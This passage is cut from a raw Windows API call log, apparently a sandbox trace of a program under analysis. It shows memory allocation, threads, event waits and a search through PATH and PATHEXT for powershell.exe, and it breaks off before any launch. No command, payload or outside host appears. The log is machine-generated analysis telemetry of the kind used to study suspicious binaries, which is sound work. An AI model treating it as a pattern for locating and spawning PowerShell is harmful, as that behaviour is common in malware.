(lpAddress=0xc000084000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000084000 [0053.679] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc000080000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x90 [0053.680] CloseHandle (hObject=0x90) returned 1 [0053.681] SetEvent (hEvent=0x84) returned 1 [0053.681] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x90 [0053.681] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x98 [0053.681] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0054.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc00002b180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe4 [0054.629] CloseHandle (hObject=0xe4) returned 1 [0054.629] ReadFile (in: hFile=0xd4, lpBuffer=0xc00000c440, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000161ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c440*, lpNumberOfBytesRead=0xc000161ddc*=0x21, lpOverlapped=0x0) returned 1 [0083.517] SetEvent (hEvent=0xf0) returned 1 [0083.517] ReadFile (in: hFile=0xd4, lpBuffer=0xc00000c5c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000161ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c5c0*, lpNumberOfBytesRead=0xc000161ddc*=0x2, lpOverlapped=0x0) returned 1 [0083.572] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0083.870] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0084.267] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) Thread: id = 4 os_tid = 0x618 [0053.681] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x27dcfea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x27dcfea0*=0x9c) returned 1 [0053.681] VirtualQuery (in: lpAddress=0x27dcfec0, lpBuffer=0x27dcfec0, dwLength=0x30 | out: lpBuffer=0x27dcfec0*(BaseAddress=0x27dcf000, AllocationBase=0x27bd0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0053.681] VirtualAlloc (lpAddress=0xc00003a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00003a000 [0053.681] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa0 [0053.681] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa4 [0053.681] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0053.774] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0053.785] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0053.785] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0054.606] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x27dcf5a0, ulCount=0x10, ulNumEntriesRemoved=0x27dcf574, dwMilliseconds=0xea25, fAlertable=0 | out: lpCompletionPortEntries=0x27dcf5a0, ulNumEntriesRemoved=0x27dcf574) returned 1 [0084.219] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x27dcf5a0, ulCount=0x10, ulNumEntriesRemoved=0x27dcf574, dwMilliseconds=0x5, fAlertable=0 | out: lpCompletionPortEntries=0x27dcf5a0, ulNumEntriesRemoved=0x27dcf574) returned 1 [0084.219] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x27dcf5a0, ulCount=0x10, ulNumEntriesRemoved=0x27dcf574, dwMilliseconds=0x5, fAlertable=0 | out: lpCompletionPortEntries=0x27dcf5a0, ulNumEntriesRemoved=0x27dcf574) returned 0 [0084.223] SetEvent (hEvent=0x84) returned 1 [0084.223] CancelIoEx (hFile=0xd4, lpOverlapped=0x0) returned 0 [0084.223] CloseHandle (hObject=0xd4) returned 1 [0084.223] CancelIoEx (hFile=0xdc, lpOverlapped=0x0) returned 0 [0084.224] CloseHandle (hObject=0xdc) returned 1 [0084.224] VirtualAlloc (lpAddress=0xc0000d0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d0000 [0084.225] VirtualAlloc (lpAddress=0xc0000d2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d2000 [0084.225] VirtualAlloc (lpAddress=0xc0000d4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d4000 [0084.225] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xc0000d4000, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0084.226] VirtualAlloc (lpAddress=0xc0000d6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d6000 [0084.228] VirtualAlloc (lpAddress=0xc0000d8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000d8000 [0084.228] VirtualAlloc (lpAddress=0xc0000da000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000da000 [0084.228] VirtualAlloc (lpAddress=0xc0000dc000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000dc000 [0084.229] GetFileAttributesExW (in: lpFileName="powershell.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.231] CreateFileW (lpFileName="powershell.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.231] GetFileAttributesExW (in: lpFileName="powershell.exe.com" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.232] CreateFileW (lpFileName="powershell.exe.com" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.232] GetFileAttributesExW (in: lpFileName="powershell.exe.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.232] CreateFileW (lpFileName="powershell.exe.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.232] GetFileAttributesExW (in: lpFileName="powershell.exe.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.232] CreateFileW (lpFileName="powershell.exe.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.232] GetFileAttributesExW (in: lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.232] CreateFileW (lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.232] GetFileAttributesExW (in: lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.232] CreateFileW (lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.232] GetFileAttributesExW (in: lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.232] CreateFileW (lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.232] GetFileAttributesExW (in: lpFileName="powershell.exe.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.232] CreateFileW (lpFileName="powershell.exe.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.232] GetFileAttributesExW (in: lpFileName="powershell.exe.jse" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.233] CreateFileW (lpFileName="powershell.exe.jse" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.233] GetFileAttributesExW (in: lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.233] CreateFileW (lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.233] GetFileAttributesExW (in: lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.233] CreateFileW (lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.233] GetFileAttributesExW (in: lpFileName="powershell.exe.msc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.233] CreateFileW (lpFileName="powershell.exe.msc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.233] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0xc0000d40d0, nSize=0x64 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0084.233] VirtualAlloc (lpAddress=0xc0000de000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000de000 [0084.234] VirtualAlloc (lpAddress=0xc0000e0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000e0000 [0084.234] VirtualAlloc (lpAddress=0xc0000e2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000e2000 [0084.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.235] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.235] VirtualAlloc (lpAddress=0xc0000e4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0000e4000 [0084.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.235] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.235] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.235] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.236] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.236] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.236] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.236] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.236] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.237] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.237] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0084.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0084.237] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, 